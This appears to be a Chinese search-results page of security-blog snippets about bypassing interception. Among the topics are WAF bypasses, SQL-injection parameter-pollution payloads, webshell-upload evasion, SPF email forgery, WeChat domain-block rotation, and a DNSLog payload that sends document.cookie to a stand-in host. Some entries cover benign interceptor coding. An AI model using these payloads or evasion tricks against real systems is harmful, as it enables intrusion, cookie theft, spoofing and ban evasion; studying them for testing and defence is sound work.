- 综合排序
- 最热优先
- 最新优先
- 来自专栏白安全组
burpsuite绕过网站拦截小技巧
有些网站为了安全性,会禁止用户使用burp并进行拦截。 大家都知道我们的burp开启后可以访问http://burp/来下载证书。 拦截burp的原理会根据网站会利用代码通过用户本地能加载burp的图标http://burp/favicon.ico,或者可以访问http://burp/ 我们解决这个只需要关闭这个功能即可 (勾上是关闭
3.5K20编辑于 2022-12-01 - 来自专栏全栈工程师修炼之路
WAF安全拦截绕过思路和手法
0x00 介绍前言 收集之中 WAF绕过方法: HPP(参数污染)方式 判断注入: xor 可直接过大部分的防护(包括安全狗) order by 大部分WAF默认拦截(包括安全狗) union 不拦截 select 不拦截 union selec 不拦截 union select 拦截 注:以上是在GET方式下的结果 POST下: and 不拦截 union select 不拦截 底线为↓ union select 1,2 from 这里开始被拦截 实际上真正要绕过的是from是否被匹配 安全狗WAF ByPass之HPP应用 描述: 一个有趣的注入点(可以使用其绕过SafeDog) #正常访问 我们继续深入学习: #我们构造下面的PoC由于&id=x相当于 ,x 所以参数值的数字都会变成,数字(用post测试) id=1137 union select 1&id=2&id=3&id=4&id=5& 22%20from%20admin #利用union爆出显位字段 3 , 15 继续注入查账号密码 id=1137%20union%20select%201&id=2&id=admin&id=4&id=5&
1.4K20发布于 2020-10-23 - 来自专栏全栈工程师修炼之路
WAF安全拦截绕过思路和手法
0x00 介绍前言 收集之中 WAF绕过方法: HPP(参数污染)方式 判断注入: xor 可直接过大部分的防护(包括安全狗) order by 大部分WAF默认拦截(包括安全狗) union 不拦截 select 不拦截 union selec 不拦截 union select 拦截 注:以上是在GET方式下的结果 POST下: and 不拦截 union select 不拦截 底线为↓ union select 1,2 from 这里开始被拦截 实际上真正要绕过的是from是否被匹配 安全狗WAF ByPass之HPP应用 描述: 一个有趣的注入点(可以使用其绕过SafeDog) #正常访问 我们继续深入学习: #我们构造下面的PoC由于&id=x相当于 ,x 所以参数值的数字都会变成,数字(用post测试) id=1137 union select 1&id=2&id=3&id=4&id=5& 22%20from%20admin #利用union爆出显位字段 3 , 15 继续注入查账号密码 id=1137%20union%20select%201&id=2&id=admin&id=4&id=5&
71830编辑于 2022-09-29 微信域名拦截原理拆解+二级域名绕过技巧(2026实操版)| 私域引流防封指南
私域推广、引流从业者常遇微信域名拦截问题,轻则错失流量,重则损失营收。微信拦截并非随机,而是三重风控逻辑,二级域名能绕开拦截,核心是利用其“单域名拦截”特性。 二、二级域名绕过微信拦截的5个实操技巧二级域名绕拦核心:单域名拦截特性+无需单独备案、可快速切换。以下技巧从基础到进阶。 技巧1:基础款——多二级域名轮询(零技术门槛)主域完成备案并申请泛域名SSL证书,提前准备5-10个备用二级域并解析,推广时轮换使用,被封即切换,适合中小规模引流,零成本但需手动管理域名池。 技巧5:合规款——优化配置(长期稳定关键)落实3点降低拦截率:完成ICP备案+HTTPS加密;删除敏感词、公示备案号,保证域名与页面主体一致;避免批量转发、多层自动跳转,配置微信业务域名。 五、总结微信域名拦截核心是“风控分层、单域拦截”,二级域名绕拦本质是合规前提下的风险分散。短期可通过“二级域名+跳板页+轮询”保障业务,长期需做好合规运营、优化配置,才能实现域名稳定,避免得不偿失。
65110编辑于 2026-04-10- 来自专栏洛米唯熊
扫目录+N多代理IP绕过拦截
在渗透测试的时候,很担心平时在扫WEB目录的时候,频繁的请求会容易被封IP.被封IP以后.要么等上一段时间,要么更换自己的IP.重新启动扫描器.这样的效率很低下,也很浪费自己的工作时间.
2.3K10发布于 2020-04-08 - 来自专栏洛米唯熊
sqlmap+外部代理池绕过IP拦截
:[0-9]{1,3}\.){3}[0-9]{1,3})", r)#正则匹配出IP与端口port=re.findall("(:\d{1,5})", r)#正则匹配出IP与端口for i,j in zip 中proxies的编写规则 proxy={'协议':'ip:端口'} 编写格式: tar=requests.get(url,headers=headers,proxies=proxy,timeout=5, :[0-9]{1,3}\.){3}[0-9]{1,3})", r)#正则匹配出IP与端口port=re.findall("(:\d{1,5})", r)#正则匹配出IP与端口for i,j in zip %s'%proxy try: tar=requests.get("https://ifconfig.me/ip",headers=headers,proxies=proxys,timeout=5,
1.9K30发布于 2020-04-12 - 来自专栏HACK学习
干货 | 最全的文件上传漏洞之WAF拦截绕过总结
大致步骤如下: 1.获取Request Header里的Content-Type值中获取boundary值2.根据第一步的boundary值,解析POST数据,获取文件名3.判断文件名是否在拦截黑名单内 /白名单外 了解了WAF如何对恶意文件进行拦截之后,我将常见的绕过方法分为如下几类,最后再使用目前最新版的安全狗进行绕过演示。 若WAF匹配文件名到换行截止,则可以绕过。 最后测出的结果如下,长度为3710个字符: image-20220122154848589 虽然并没有帮我们上传上去,但是可以成功绕过安全狗拦截。 image-20220122161340032 成功绕过。
16K67编辑于 2022-02-17 - 来自专栏pankas的技术分享
关于md5的绕过技巧
)){ echo 'OK'; } php弱类型比较产生的漏洞 想要满足这个判断只需要构造出MD5值为0e开头的字符串,这样的话弱类型比较会认为是科学技术法,0的多少次方都是0,因此可以绕过 有一些字符串的 $str1) === md5($str2)) { echo 'OK'; } 因为是强类型比较,用0e开头的字符串是没办法绕过的了,但是PHP自身的特性使得可以提交一个数组,而md5函数传入数组的返回值都是 NULL,这样就可以绕过强类型比较了。 MD5碰撞,对于需要两个内容不同但是MD5值相同的文件,使用Fastcoll(工具下载)就可以了 绕过md5()来构造攻击语句 select * from 'admin' where password= 等价于 or 一个永真式,因此相当于万能密码,可以绕过md5()函数
1K10编辑于 2022-08-10 - 来自专栏分布式|微服务|性能优化|并发编程|源码分析
5.实战gRPC拦截器
gRPC 拦截器是一种强大的功能,用于在 gRPC 调用过程中对请求和响应进行拦截、修改和监视。 拦截器允许你在请求和响应被发送和接收之前或之后插入自定义逻辑,从而实现各种功能,如认证、授权、日志记录、错误处理等。拦截器可以在客户端和服务器两端使用,它们是实现横切关注点的一种重要方式。 使用场景 认证和授权: 使用拦截器可以实现认证和授权逻辑。在拦截器中,你可以验证请求的身份、权限等信息,并根据情况决定是否允许请求继续进行。 性能监视: 使用拦截器可以监视 gRPC 调用的性能指标,如调用时间、响应时间等,从而实现性能监控和优化。 传输层安全: 拦截器可以用于添加和处理传输层安全(TLS)相关的信息,如证书、密钥等。 代码实现 gRPC拦截器分为两种,即客户端拦截器和服务端拦截器,我们现在通过这两种拦截器来实现日志记录 服务端拦截器 public class ServerLoggingInterceptor implements
75710编辑于 2023-12-11 - 来自专栏Bypass
邮件伪造之SPF绕过的5种思路
nslookup -type=txt qq.com 本文结合SPF配置的过程,通过一些邮件测试验证,分享了5种SPF绕过的思路。 综上,当我们在查看一个域名的SPF记录时,它其实不只是一条解析记录,更是一种邮件安全的策略,SPF记录配置不严或SPF解析错误,就容易导致大量本该被拦截的邮件直接被放进来,而绕过的策略就隐藏在这条SPF [rvlwtgejv5.png] 我们分别使用网页版邮箱和客户端邮箱打开同一封邮件,通过对比可以发现,不同的邮件客户端对发件人位置的内容解析是不一样的。 5、From字段名截断绕过 当我们伪造邮件发送成功的时候,由于Sender和From字段不一样,部分邮件客户端接收邮件后,会提示邮件代发。 udzA7dSxIDxhZG1pbkBxcS5jb20+0aGhoaGhoaGhoaGhoaGhoaGhoaGhoQ==?==?gb2312?B?
8.9K41发布于 2020-05-21 - 来自专栏字节脉搏实验室
WAF的那点事
硬件型WAF 以硬件形式部署在链路中,支持多种部署方式,当串联到链路中时可以拦截恶意流量,在旁路监听模式时只记录攻击不进行拦截。 WAF方法 例如SQL注入漏洞绕过 1.大小写混合 在规则匹配时只针对特定大写或小写的情况,遇到时可以使用大小写混合绕过。 3.替换关键字 WAF采用替换或者删除select等敏感关键字的时候,如果只匹配一次则很容易进行绕过。 and*/ 1=2 后面语句与union注入的一致 5.多参数请求拆分 对于多个参数拼接到同一条sql语句中的情况,可以将注入语句分割插入。 ③找网站的二级域名、NS、MX记录等对应的IP。 ④使网站发送邮件给你,查看发送方的IP。
1.1K10发布于 2020-04-14 - 来自专栏ceshiren0001
Playwright进阶指南 (5):拦截与模拟网络请求
Playwright 提供了强大的网络请求拦截与Mock能力,让你能够:拦截并修改 请求头、参数、URL模拟API响应 无需依赖真实后端构造异常场景 测试边缘情况加速测试执行 避免真实网络延迟一、核心概念 = p.chromium.launch() context = browser.new_context() page = context.new_page() # 核心路由拦截方法 Authorization"] = "Bearer mock_token" # 注入模拟Token route.continue_(headers=headers) # 修改后继续请求场景2:拦截特定请求返回 {req.url} {req.failure}"))五、性能优化:选择性拦截避免不必要的处理开销:# 精确匹配URLpage.route("https://api.example.com/v1/users 逻辑封装为独立模块,通过环境变量控制Mock开关:if os.getenv("MOCK_MODE") == "enable": apply_mocks(page)通过灵活运用Playwright的请求拦截能力
59000编辑于 2025-08-22 - 来自专栏网站漏洞修补
渗透测试服务 针对CSRF漏洞检测与代码防御办法
通常我们SINE安全在渗透测试客户网站是否存在csrf漏洞,首先采用点击的形式去测试漏洞,在一个网站功能上利用点击的方式绕过安全效验与拦截,从技术层面上来讲,点击的请求操作来自于信任的网站,是不会对csrf 再一个检测漏洞的方式更改请求方式,比如之前网站使用的都是get提交方式去请求网站的后端,我们可以伪造参数,抓包修改post提交方式发送过去,就可以绕过网站之前的安全防护,直接执行CSRF恶意代码,漏洞产生的原因就是 ,网站开发者只针对了GET请求方式进行安全拦截,并没有对post的方式进行拦截,导致漏洞的发生。 有些客户网站使用了token来防止XSS跨站的攻击,在设计token的时候没有考虑到空值是否可以绕过的问题,导致可以token为空,就可以直接将恶意代码传入到后端中去。 对referer字段进行安全效验,检查URL是否是白名单里的,对于referer为空直接拦截掉该请求,URL的白名单要含有WWW,拒绝二级域名的请求。
76840发布于 2019-09-06 - 来自专栏网站漏洞修复
渗透测试公司 该如何检测CSRF漏洞 原
通常我们SINE安全在渗透测试客户网站是否存在csrf漏洞,首先采用点击的形式去测试漏洞,在一个网站功能上利用点击的方式绕过安全效验与拦截,从技术层面上来讲,点击的请求操作来自于信任的网站,是不会对csrf 再一个检测漏洞的方式更改请求方式,比如之前网站使用的都是get提交方式去请求网站的后端,我们可以伪造参数,抓包修改post提交方式发送过去,就可以绕过网站之前的安全防护,直接执行CSRF恶意代码,漏洞产生的原因就是 ,网站开发者只针对了GET请求方式进行安全拦截,并没有对post的方式进行拦截,导致漏洞的发生。 有些客户网站使用了token来防止XSS跨站的攻击,在设计token的时候没有考虑到空值是否可以绕过的问题,导致可以token为空,就可以直接将恶意代码传入到后端中去。 对referer字段进行安全效验,检查URL是否是白名单里的,对于referer为空直接拦截掉该请求,URL的白名单要含有WWW,拒绝二级域名的请求。
1.2K10发布于 2019-09-08 - 来自专栏世荣的博客
DNSLog的使用方法
我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级域名甚至三级域名上去请求,就可以通过DNS解析日志来获取它们。 场景三:XSS绕过CSP CSP(内容安全策略)是防御XSS最有效的手段之一。 当我们发现一个网站有XSS漏洞,想利用XSS平台来打Cookie时,CSP会通过白名单的方式禁止跨域加载脚本,恶意代码会被拦截,导致XSS无法利用。 这里,我们通过DNS解析突破CSP的拦截。 由于DNS预解析可以绕过CSP进行解析,结合DNSLOG,我们即可窃取在CSP保护下的Cookie。 document.cookie.split(/;|=/)[1]) + ".your-dnslog.com'>" 上面的Payload将Cookie中截取的重要字段进行简单的base64编码后,作为我们DNSLOG平台的二级域名
4.6K20编辑于 2022-03-21 - 来自专栏大宇笔记
WKWebview嵌入H5 Windows.open 无法拦截问题
问题 ---- 嵌入H5页面,点击之后拦截链接进行后续操作。 结果使用代理方法拦截不到: public func webView(_ webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) { decisionHandler(.allow) } 分析点:H5
1K00发布于 2020-01-13 - 来自专栏FreeBuf
小米范系列渗透测试工具介绍
工具三:小米范子域名收集工具:收集子域名(二级域名、三级域名、四级域名) 工作原理: 1、获取常用记录类型。 3、通过搜索引擎、获取其他接口查询二级域名(百度、必应、netcraft,可设置爬取线程也爬取条数) 4、通过字典爆破二级域名(可自定义线程数即字典)。 3、请求拦截、修改(此拦截并非使用代理的方式,不存在https安装证书的问题,但是有些地方也没有代理拦截那么方便)。 4、多个代理快速切换。 5、网页URL提取。 可绕过前端js加密、但速度慢、用于少量口令破解),可自行替换字典,路径dict/form-username.txt、dict/form-password.txt。 10、域名反查(调用爱站)。 11、二级域名查询(调用netcraft)。
5.6K50发布于 2018-02-08 - 来自专栏HACK学习
干货|挖掘赏金漏洞中,绕过WAF的常用5种方式
漏洞挖掘中,绕过WAF的5种方式 简介 WAF是一种用于过滤和阻止恶意网络流量的网络安全解决方案。 绕过WAF的5种方式 本节将用示例概述一些潜在的WAFBypass技术。 1.绕过Regex 此方法适用于WAF和Web服务器完成的正则表达式过滤。 以下示例演示了一些绕过正则表达式和注释的方法。 >> urllib.parse.quote_plus(s.encode("IBM037")) 'L%A2%83%99%89%97%A3n%81%93%85%99%A3M%7F%A7%A2%A2%7F%5DLa 在清理输入后对其进行规范化的Web服务器可能容易通过Unicode兼容性绕过WAF。 5.未初始化的变量 潜在的方法是在您的请求中使用未初始化的变量(例如$u),如本文所示。
3.5K30编辑于 2023-08-22 - 来自专栏FreeBuf
绕过网站安全狗拦截,上传Webshell技巧总结 | 附免杀PHP一句话
*本文原创作者:1_2,本文属FreeBuf原创奖励计划,未经许可禁止转载 这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法。 思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。 废话不多说,切入正题。。。。 > 因为此次实验的目的是绕过网站安全狗,所以PHP源码上我没做任何检测,把上传的文件直接放在upload目录下。 3、先看一下正常的HTTP请求: ? 很明显,文件名为”yijuhua.php”被拦截。。。。 4、尝试%00截断: ? 很明显,失败了。。。 5、修改HTTP请求,构造畸形HTTP请求 (1)删除实体里面的Conten-Type字段: ? ? 绕过网站安全狗的拦截,成功上传WebShell。。。
2.3K90发布于 2018-02-09 - 来自专栏FreeBuf
Android 5.x漏洞:黑客可以绕过屏幕密码进入系统
很多Android用户会选择使用锁屏密码保护设备,但最新爆出的漏洞却令人震惊:任何人无需复杂的操作即可绕过锁屏直接进入你的系统! 此漏洞存在于Android 5.x <= 5.1.1的版本中,UT Austin团队在6月25日提交漏洞给Android后,Android在9月9日的新版本(build LMY48M)中修复了该漏洞。 5. 接下来就等待相机应用崩溃,然后暴露主屏了。这一步骤消耗的时间可能会根据不同的情况相差巨大,但是结果都应该是相机崩溃。你应该注意到相机的对焦过程有点慢,如果你用实体按键拍照可能会加快崩溃的进程。
2.4K100发布于 2018-02-06
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号